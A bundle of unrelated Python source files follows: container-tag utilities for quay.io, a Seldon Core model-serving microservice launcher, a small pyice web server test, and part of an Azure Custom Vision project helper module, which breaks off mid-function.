# print(threading.enumerate())
# # 当前执行的线程
# print(threading.current_thread())
added_thread.start()
if __name__ == "__main__":
main()
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('PARSED_TAG', 'tag version build_string build_number')
QUAY_IO_TIMEOUT = 10
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers, timeout=QUAY_IO_TIMEOUT)
def quay_versions(namespace, pkg_name, session=None):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name, session=session)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name, session=None):
assert namespace is not None
assert pkg_name is not None
url = f'https://quay.io/api/v1/repository/{namespace}/{pkg_name}'
if not session:
session = requests.session()
response = session.get(url, timeout=QUAY_IO_TIMEOUT)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Get all quay containers in the biocontainers repo
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=QUAY_IO_TIMEOUT)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None, session=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.info("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image, session)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag.rsplit(':')[-1]
build_string = "-1"
build_number = -1
match = BUILD_NUMBER_REGEX.search(version)
if match:
build_number = int(match.group(0))
if '--' in version:
version, build_string = version.rsplit('--', 1)
elif '-' in version:
# Should be mulled multi-container image tag
version, build_string = version.rsplit('-', 1)
else:
# We don't have a build number, and the BUILD_NUMBER_REGEX above is only accurate for build strings,
# so set build number to -1. Any matching image:version combination with a build number
# will be considered newer.
build_number = -1
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
elements = sorted(elements, key=lambda tag: tag.version, reverse=True)
return [e.tag for e in elements]
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
# conda package and quay image names are lowercase
return Target(package_name.lower(), version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
build = target.build
if build is None and image_build is not None and image_build != "0":
# Special case image_build == "0", which has been built without a suffix
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
build = image_build
suffix += ":%s" % target.version
if build is not None:
suffix += "--%s" % build
return f"{target.package_name}{suffix}"
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return f"mulled-v1-{m.hexdigest()}{suffix}"
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1--py_1'
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1--py_1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
# tagged verson is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = f":{version_hash_str}{build_suffix}"
return f"mulled-v2-{package_hash.hexdigest()}{suffix}"
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
r = requests.get(url)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress:
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = threading.Event()
def progress(self):
while not self.stop.is_set():
print(".", end="")
sys.stdout.flush()
self.stop.wait(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop.set()
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
microservice.py
|
import argparse
import os
import importlib
import json
import time
import logging
import multiprocessing as mp
import threading
import sys
from typing import Dict, Callable
from distutils.util import strtobool
from seldon_core import persistence, __version__, wrapper as seldon_microservice
from seldon_core.metrics import SeldonMetrics
from seldon_core.flask_utils import ANNOTATIONS_FILE, SeldonMicroserviceException
from seldon_core.utils import getenv_as_bool
from seldon_core.app import (
StandaloneApplication,
UserModelApplication,
accesslog,
threads,
post_worker_init,
)
logger = logging.getLogger(__name__)
PARAMETERS_ENV_NAME = "PREDICTIVE_UNIT_PARAMETERS"
SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_SERVICE_PORT"
METRICS_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_METRICS_SERVICE_PORT"
FILTER_METRICS_ACCESS_LOGS_ENV_NAME = "FILTER_METRICS_ACCESS_LOGS"
LOG_LEVEL_ENV = "SELDON_LOG_LEVEL"
DEFAULT_LOG_LEVEL = "INFO"
DEFAULT_PORT = 5000
DEFAULT_METRICS_PORT = 6000
DEBUG_ENV = "SELDON_DEBUG"
def start_servers(
target1: Callable, target2: Callable, metrics_target: Callable
) -> None:
"""
Start servers
Parameters
----------
target1
Main flask process
target2
Auxilary flask process
"""
p2 = None
if target2:
p2 = mp.Process(target=target2, daemon=True)
p2.start()
p3 = None
if metrics_target:
p3 = mp.Process(target=metrics_target, daemon=True)
p3.start()
target1()
if p2:
p2.join()
if p3:
p3.join()
def parse_parameters(parameters: Dict) -> Dict:
"""
Parse the user object parameters
Parameters
----------
parameters
Returns
-------
"""
type_dict = {
"INT": int,
"FLOAT": float,
"DOUBLE": float,
"STRING": str,
"BOOL": bool,
}
parsed_parameters = {}
for param in parameters:
name = param.get("name")
value = param.get("value")
type_ = param.get("type")
if type_ == "BOOL":
parsed_parameters[name] = bool(strtobool(value))
else:
try:
parsed_parameters[name] = type_dict[type_](value)
except ValueError:
raise SeldonMicroserviceException(
"Bad model parameter: "
+ name
+ " with value "
+ value
+ " can't be parsed as a "
+ type_,
reason="MICROSERVICE_BAD_PARAMETER",
)
except KeyError:
raise SeldonMicroserviceException(
"Bad model parameter type: "
+ type_
+ " valid are INT, FLOAT, DOUBLE, STRING, BOOL",
reason="MICROSERVICE_BAD_PARAMETER",
)
return parsed_parameters
def load_annotations() -> Dict:
"""
Attempt to load annotations
Returns
-------
"""
annotations = {}
try:
if os.path.isfile(ANNOTATIONS_FILE):
with open(ANNOTATIONS_FILE, "r") as ins:
for line in ins:
line = line.rstrip()
parts = list(map(str.strip, line.split("=", 1)))
if len(parts) == 2:
key = parts[0]
value = parts[1][1:-1] # strip quotes at start and end
logger.info("Found annotation %s:%s ", key, value)
annotations[key] = value
else:
logger.info("Bad annotation [%s]", line)
except:
logger.error("Failed to open annotations file %s", ANNOTATIONS_FILE)
return annotations
def setup_tracing(interface_name: str) -> object:
logger.info("Initializing tracing")
from jaeger_client import Config
jaeger_serv = os.environ.get("JAEGER_AGENT_HOST", "0.0.0.0")
jaeger_port = os.environ.get("JAEGER_AGENT_PORT", 5775)
jaeger_config = os.environ.get("JAEGER_CONFIG_PATH", None)
if jaeger_config is None:
logger.info("Using default tracing config")
config = Config(
config={ # usually read from some yaml config
"sampler": {"type": "const", "param": 1},
"local_agent": {
"reporting_host": jaeger_serv,
"reporting_port": jaeger_port,
},
"logging": True,
},
service_name=interface_name,
validate=True,
)
else:
logger.info("Loading tracing config from %s", jaeger_config)
import yaml
with open(jaeger_config, "r") as stream:
config_dict = yaml.load(stream)
config = Config(
config=config_dict, service_name=interface_name, validate=True
)
# this call also sets opentracing.tracer
return config.initialize_tracer()
class MetricsEndpointFilter(logging.Filter):
def filter(self, record):
return seldon_microservice.METRICS_ENDPOINT not in record.getMessage()
def setup_logger(log_level: str, debug_mode: bool) -> logging.Logger:
# set up log level
log_level_raw = os.environ.get(LOG_LEVEL_ENV, log_level.upper())
log_level_num = getattr(logging, log_level_raw, None)
if not isinstance(log_level_num, int):
raise ValueError("Invalid log level: %s", log_level)
logger.setLevel(log_level_num)
# Set right level on access logs
flask_logger = logging.getLogger("werkzeug")
flask_logger.setLevel(log_level_num)
if getenv_as_bool(FILTER_METRICS_ACCESS_LOGS_ENV_NAME, default=not debug_mode):
flask_logger.addFilter(MetricsEndpointFilter())
gunicorn_logger = logging.getLogger("gunicorn.access")
gunicorn_logger.addFilter(MetricsEndpointFilter())
logger.debug("Log level set to %s:%s", log_level, log_level_num)
# set log level for the imported microservice type
seldon_microservice.logger.setLevel(log_level_num)
logging.getLogger().setLevel(log_level_num)
for handler in logger.handlers:
handler.setLevel(log_level_num)
return logger
def main():
LOG_FORMAT = (
"%(asctime)s - %(name)s:%(funcName)s:%(lineno)s - %(levelname)s: %(message)s"
)
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
logger.info("Starting microservice.py:main")
logger.info(f"Seldon Core version: {__version__}")
sys.path.append(os.getcwd())
parser = argparse.ArgumentParser()
parser.add_argument("interface_name", type=str, help="Name of the user interface.")
parser.add_argument("api_type", type=str, choices=["REST", "GRPC", "FBS"])
parser.add_argument(
"--service-type",
type=str,
choices=["MODEL", "ROUTER", "TRANSFORMER", "COMBINER", "OUTLIER_DETECTOR"],
default="MODEL",
)
parser.add_argument("--persistence", nargs="?", default=0, const=1, type=int)
parser.add_argument(
"--parameters", type=str, default=os.environ.get(PARAMETERS_ENV_NAME, "[]")
)
parser.add_argument(
"--log-level",
type=str,
choices=["DEBUG", "INFO", "WARNING", "ERROR"],
default=DEFAULT_LOG_LEVEL,
help="Log level of the inference server.",
)
parser.add_argument(
"--debug",
nargs="?",
type=bool,
default=getenv_as_bool(DEBUG_ENV, default=False),
const=True,
help="Enable debug mode.",
)
parser.add_argument(
"--tracing",
nargs="?",
default=int(os.environ.get("TRACING", "0")),
const=1,
type=int,
)
# gunicorn settings, defaults are from
# http://docs.gunicorn.org/en/stable/settings.html
parser.add_argument(
"--workers",
type=int,
default=int(os.environ.get("GUNICORN_WORKERS", "1")),
help="Number of Gunicorn workers for handling requests.",
)
parser.add_argument(
"--threads",
type=int,
default=int(os.environ.get("GUNICORN_THREADS", "10")),
help="Number of threads to run per Gunicorn worker.",
)
parser.add_argument(
"--max-requests",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS", "0")),
help="Maximum number of requests gunicorn worker will process before restarting.",
)
parser.add_argument(
"--max-requests-jitter",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS_JITTER", "0")),
help="Maximum random jitter to add to max-requests.",
)
parser.add_argument(
"--single-threaded",
type=int,
default=int(os.environ.get("FLASK_SINGLE_THREADED", "0")),
help="Force the Flask app to run single-threaded. Also applies to Gunicorn.",
)
parser.add_argument(
"--port",
type=int,
default=int(os.environ.get(SERVICE_PORT_ENV_NAME, DEFAULT_PORT)),
help="Set port of seldon service",
)
parser.add_argument(
"--metrics-port",
type=int,
default=int(
os.environ.get(METRICS_SERVICE_PORT_ENV_NAME, DEFAULT_METRICS_PORT)
),
help="Set metrics port of seldon service",
)
args = parser.parse_args()
parameters = parse_parameters(json.loads(args.parameters))
setup_logger(args.log_level, args.debug)
# set flask trace jaeger extra tags
jaeger_extra_tags = list(
filter(
lambda x: (x != ""),
[tag.strip() for tag in os.environ.get("JAEGER_EXTRA_TAGS", "").split(",")],
)
)
logger.info("Parse JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
annotations = load_annotations()
logger.info("Annotations: %s", annotations)
parts = args.interface_name.rsplit(".", 1)
if len(parts) == 1:
logger.info("Importing %s", args.interface_name)
interface_file = importlib.import_module(args.interface_name)
user_class = getattr(interface_file, args.interface_name)
else:
logger.info("Importing submodule %s", parts)
interface_file = importlib.import_module(parts[0])
user_class = getattr(interface_file, parts[1])
if args.persistence:
logger.info("Restoring persisted component")
user_object = persistence.restore(user_class, parameters)
persistence.persist(user_object, parameters.get("push_frequency"))
else:
user_object = user_class(**parameters)
port = args.port
metrics_port = args.metrics_port
if args.tracing:
tracer = setup_tracing(args.interface_name)
if args.api_type == "REST":
seldon_metrics = SeldonMetrics(worker_id_func=os.getpid)
if args.debug:
# Start Flask debug server
def rest_prediction_server():
app = seldon_microservice.get_rest_microservice(
user_object, seldon_metrics
)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
if args.tracing:
logger.info("Tracing branch is active")
from flask_opentracing import FlaskTracing
logger.info("Set JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
FlaskTracing(tracer, True, app, jaeger_extra_tags)
app.run(
host="0.0.0.0",
port=port,
threaded=False if args.single_threaded else True,
)
logger.info(
"REST microservice running on port %i single-threaded=%s",
port,
args.single_threaded,
)
server1_func = rest_prediction_server
else:
# Start production server
def rest_prediction_server():
options = {
"bind": "%s:%s" % ("0.0.0.0", port),
"accesslog": accesslog(args.log_level),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"threads": threads(args.threads, args.single_threaded),
"workers": args.workers,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
app = seldon_microservice.get_rest_microservice(
user_object, seldon_metrics
)
UserModelApplication(app, user_object, options=options).run()
logger.info("REST gunicorn microservice running on port %i", port)
server1_func = rest_prediction_server
elif args.api_type == "GRPC":
seldon_metrics = SeldonMetrics(
worker_id_func=lambda: threading.current_thread().name
)
def grpc_prediction_server():
if args.tracing:
from grpc_opentracing import open_tracing_server_interceptor
logger.info("Adding tracer")
interceptor = open_tracing_server_interceptor(tracer)
else:
interceptor = None
server = seldon_microservice.get_grpc_server(
user_object,
seldon_metrics,
annotations=annotations,
trace_interceptor=interceptor,
)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
server.add_insecure_port(f"0.0.0.0:{port}")
server.start()
logger.info("GRPC microservice Running on port %i", port)
while True:
time.sleep(1000)
server1_func = grpc_prediction_server
else:
server1_func = None
def rest_metrics_server():
app = seldon_microservice.get_metrics_microservice(seldon_metrics)
if args.debug:
app.run(host="0.0.0.0", port=metrics_port)
else:
options = {
"bind": "%s:%s" % ("0.0.0.0", metrics_port),
"accesslog": accesslog(args.log_level),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
StandaloneApplication(app, options=options).run()
logger.info("REST metrics microservice running on port %i", metrics_port)
metrics_server_func = rest_metrics_server
if hasattr(user_object, "custom_service") and callable(
getattr(user_object, "custom_service")
):
server2_func = user_object.custom_service
else:
server2_func = None
logger.info("Starting servers")
start_servers(server1_func, server2_func, metrics_server_func)
if __name__ == "__main__":
main()
|
web_test.py
|
import asyncio
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except:
print("Warning: Unable to initialize uvloop")
from pyice import web_async
from pyice import web
import threading
import time
server = web.Server(web.ServerConfig().set_num_executors(3).set_listen_addr("127.0.0.1:2716"))
@server.define_route("/hello_world")
def hello_world(req):
req.create_response().set_body("Hello world!").send()
@server.define_route("/hello_world_threaded")
def hello_world_threaded(req):
t = threading.Thread(target = lambda: hello_world(req))
t.start()
@server.define_route("/hello_world_async")
async def hello_world_async(req):
req.create_response().set_body("Hello world! (Async)").send()
@server.define_route(None)
def default_target(req):
req.create_response().set_body("Target not found").send()
server.listen()
while True:
time.sleep(10000000)
|
utils.py
|
"""App utilities.
"""
import json
import logging
import sys
import threading
import time
import traceback
from configs.general_configs import PRINT_THREAD
from ..azure_app_insight.utils import get_app_insight_logger
from ..azure_parts.models import Part
from ..azure_parts.utils import batch_upload_parts_to_customvision, upload_part_to_customvision_helper
from ..azure_settings.exceptions import SettingCustomVisionAccessFailed
from ..azure_settings.models import Setting
from ..azure_training_status import progress
from ..azure_training_status.utils import upcreate_training_status
from ..images.models import Image
from ..images.utils import upload_images_to_customvision_helper
from ..notifications.models import Notification
from .exceptions import ProjectAlreadyTraining, ProjectRemovedError
from .models import Project, Task
logger = logging.getLogger(__name__)
def update_app_insight_counter(
project_obj,
has_new_parts: bool,
has_new_images: bool,
parts_last_train: int,
images_last_train: int,
):
"""Send message to app insight."""
try:
retrain = train = 0
if has_new_parts:
logger.info("This is a training job")
train = 1
elif has_new_images:
logger.info("This is a re-training job")
retrain = 1
else:
logger.info("Project not changed")
logger.info(
"Sending Data to App Insight %s", project_obj.setting.is_collect_data
)
if project_obj.setting.is_collect_data:
logger.info("Sending Logs to App Insight")
trainer = project_obj.setting.get_trainer_obj()
images_now = trainer.get_tagged_image_count(project_obj.customvision_id)
parts_now = len(trainer.get_tags(project_obj.customvision_id))
# Traces
az_logger = get_app_insight_logger()
az_logger.warning(
"training",
extra={
"custom_dimensions": {
"train": train,
"images": images_now - images_last_train,
"parts": parts_now - parts_last_train,
"retrain": retrain,
}
},
)
except Exception:
logger.exception("update_app_insight_counter occur unexcepted error")
raise
def create_cv_project_helper(name: str, tags = None, project_type: str = None, classification_type: str = None):
setting_obj = Setting.objects.first()
inputs_ = [
{
"name": "data",
"metadata": {
"type": "image",
"shape": [1, 3, 416, 416],
"layout": ["N", "H", "W", "C"],
"color_format": "BGR",
}
}
]
inputs = json.dumps(inputs_)
project_obj = Project.objects.create(name=name, setting=setting_obj, is_demo=False, project_type=project_type, category="customvision", classification_type=classification_type, is_cascade=True, type="customvision_model", inputs=inputs)
logger.info("Creating Parts:")
for tag in tags:
logger.info("Creating Part: %s",tag)
part_obj, created = Part.objects.update_or_create(
project_id=project_obj.id,
name=tag,
description="",
)
# Make sure part is created
if not created:
logger.exception("%s not created", tag)
continue
logger.info("Create Part: %s Success!", tag)
logger.info("Creating CV project:")
project_obj.create_project(project_type=project_type, classification_type=classification_type)
logger.info("Uploading tags to CV project:")
part_ids = [part.id for part in Part.objects.filter(project=project_obj)]
has_new_parts = batch_upload_parts_to_customvision(
project_id=project_obj.id, part_ids=part_ids, tags_dict={}
)
# update node outputs
trainer = project_obj.setting.get_trainer_obj()
customvision_project_id = project_obj.customvision_id
tags = trainer.get_tags(customvision_project_id)
labels = []
for tag in tags:
labels.append(tag.name)
outputs_ = [
{
"name": "detection_out",
"metadata": {
"type": "bounding_box",
"shape": [1, 1, 200, 7],
"layout": [1, 1, "B", "F"],
"labels": labels,
}
}
]
project_obj.outputs = json.dumps(outputs_)
project_obj.save()
return(project_obj)
def update_tags_helper(project_id, tags=None):
project_obj = Project.objects.get(pk=project_id)
parts = Part.objects.filter(project=project_obj)
part_names = [part.name for part in parts]
part_ids = [part.id for part in parts]
to_add = []
to_delete = []
for tag in tags:
if tag not in part_names:
to_add.append(tag)
for part in parts:
if part.name not in tags:
to_delete.append(part.id)
logger.info("Creating Parts:")
for tag in to_add:
logger.info("Creating Part: %s",tag)
part_obj, created = Part.objects.update_or_create(
project_id=project_obj.id,
name=tag,
description="",
)
# Make sure part is created
if not created:
logger.exception("%s not created", tag)
continue
logger.info("Create Part: %s Success!", tag)
logger.info("Uploading tags to CV project:")
part_ids = [part.id for part in Part.objects.filter(project=project_obj)]
has_new_parts = batch_upload_parts_to_customvision(
project_id=project_obj.id, part_ids=part_ids, tags_dict={}
)
# delete part
for part_id in to_delete:
part_obj = Part.objects.filter(pk=part_id).first()
part_obj.delete_on_customvision = True
part_obj.delete()
def pull_cv_project_helper(customvision_project_id: str, is_partial: bool):
"""pull_cv_project_helper.
Args:
project_id: Django ORM project id
customvision_project_id (str): customvision_project_id
is_partial (bool): is_partial
"""
logger.info("pull_cv_project_helper")
logger.info("customvision_project_id: %s", customvision_project_id)
logger.info("is_partial %s", is_partial)
# Get project objects
#TODO need to resolve hard-coded pk=20
# project_obj_template = Project.objects.get(pk=12)
setting_obj = Setting.objects.first()
inputs_ = [
{
"name": "data",
"metadata": {
"type": "image",
"shape": [1, 3, 416, 416],
"layout": ["N", "H", "W", "C"],
"color_format": "BGR",
}
}
]
inputs = json.dumps(inputs_)
project_obj = Project.objects.create(
setting=setting_obj,
is_demo=False,
category="customvision",
is_cascade=True,
type="customvision_model",
inputs=inputs,
)
# Check Training_Key, Endpoint
if not project_obj.setting.is_trainer_valid:
raise SettingCustomVisionAccessFailed
trainer = project_obj.setting.get_trainer_obj()
# Check Customvision Project id
try:
trainer.get_project(customvision_project_id)
except Exception:
raise ProjectRemovedError
# Invalid CustomVision Project ID handled by exception
project_obj.name = trainer.get_project(project_id=customvision_project_id).name
project_obj.setting.domain_id = trainer.get_project(customvision_project_id).settings.domain_id
project_obj.project_type = trainer.get_domain(trainer.get_project(customvision_project_id).settings.domain_id).type
if project_obj.project_type == "Classification":
project_obj.classification_type = trainer.get_project(customvision_project_id).settings.classification_type
project_obj.customvision_id = customvision_project_id
# Delete parts and images
logger.info("Deleting all parts and images...")
logger.info("Handle by signals...")
# Download parts and images
logger.info("Pulling Parts...")
counter = 0
# update node outputs
tags = trainer.get_tags(customvision_project_id)
labels = []
for tag in tags:
labels.append(tag.name)
outputs_ = [
{
"name": "detection_out",
"metadata": {
"type": "bounding_box",
"shape": [1, 1, 200, 7],
"layout": [1, 1, "B", "F"],
"labels": labels,
}
}
]
project_obj.outputs = json.dumps(outputs_)
project_obj.save()
for tag in tags:
logger.info("Creating Part %s: %s %s", counter, tag.name, tag.description)
part_obj, created = Part.objects.update_or_create(
project_id=project_obj.id,
name=tag.name,
description=tag.description if tag.description else "",
customvision_id=tag.id,
)
# Make sure part is created
if not created:
logger.exception("%s not created", tag.name)
continue
logger.info(
"Create Part %s: %s %s Success!", counter, tag.name, tag.description
)
counter += 1
# Download one image as icon
if is_partial:
logger.info("Try to download one image as icon.")
# Image file
imgs_with_tag = trainer.get_tagged_images(
project_id=customvision_project_id, tag_ids=[tag.id], take=1
)
if len(imgs_with_tag) < 1:
logger.info("This tag does not have an image")
continue
img = imgs_with_tag[0]
img_obj, created = Image.objects.update_or_create(
part=part_obj,
remote_url=img.original_image_uri,
customvision_id=img.id,
project_id=project_obj.id,
uploaded=True,
manual_checked=True,
)
try:
img_obj.get_remote_image()
except Exception:
logger.exception("Download remote image occur exception.")
logger.exception("Image discarded...")
img_obj.delete()
continue
# Image Labels
logger.info("Finding region with tag (%s, %s)", tag.name, tag.id)
for region in img.regions:
if region.tag_id == tag.id:
logger.info("Region Found")
img_obj.set_labels(
left=region.left,
top=region.top,
width=region.width,
height=region.height,
tag_id=img_obj.part.pk,
)
break
logger.info("Pulled %s Parts... End", counter)
# Partial Download
if is_partial:
exporting_task_obj = Task.objects.create(
task_type="export_iteration",
status="init",
log="Just Started",
project=project_obj,
)
exporting_task_obj.start_exporting()
return
# Full Download
logger.info("Pulling Tagged Images...")
img_counter = 0
imgs_count = trainer.get_tagged_image_count(project_id=customvision_project_id)
img_batch_size = 50
img_index = 0
while img_index <= imgs_count:
logger.info("Img Index: %s. Img Count: %s", img_index, imgs_count)
imgs = trainer.get_tagged_images(
project_id=customvision_project_id, take=img_batch_size, skip=img_index
)
for img in imgs:
logger.info("*** img %s", img_counter)
img_obj, created = Image.objects.update_or_create(
remote_url=img.original_image_uri,
project=project_obj,
customvision_id=img.id,
manual_checked=True,
)
img_id = img_obj.id
if created:
# logger.info("Downloading img %s", img.id)
# img_obj.get_remote_image()
# logger.info("Setting label of %s", img.id)
# img_obj.set_labels(
# left=region.left,
# top=region.top,
# width=region.width,
# height=region.height,
# tag_id=img_obj.part.pk,
# )
img_counter += 1
for region in img.regions:
part_objs = Part.objects.filter(
name=region.tag_name, project_id=project_obj.id
)
if not part_objs.exists():
continue
part_obj = part_objs.first()
logger.info("Adding label to %s", img.id)
# img_obj = Image.objects.get(pk=img_id)
img_obj.part = part_obj
img_obj.get_remote_image()
img_obj.set_labels(
left=region.left,
top=region.top,
width=region.width,
height=region.height,
tag_id=part_obj.id,
)
img_index += img_batch_size
logger.info("Pulled %s images", counter)
logger.info("Pulling Tagged Images... End")
logger.info("Pulling Custom Vision Project... End")
def train_project_worker(project_id):
"""train_project_worker.
Args:
project_id: Django ORM project id
"""
# =====================================================
# 0. Bypass project that need no traing ===
# =====================================================
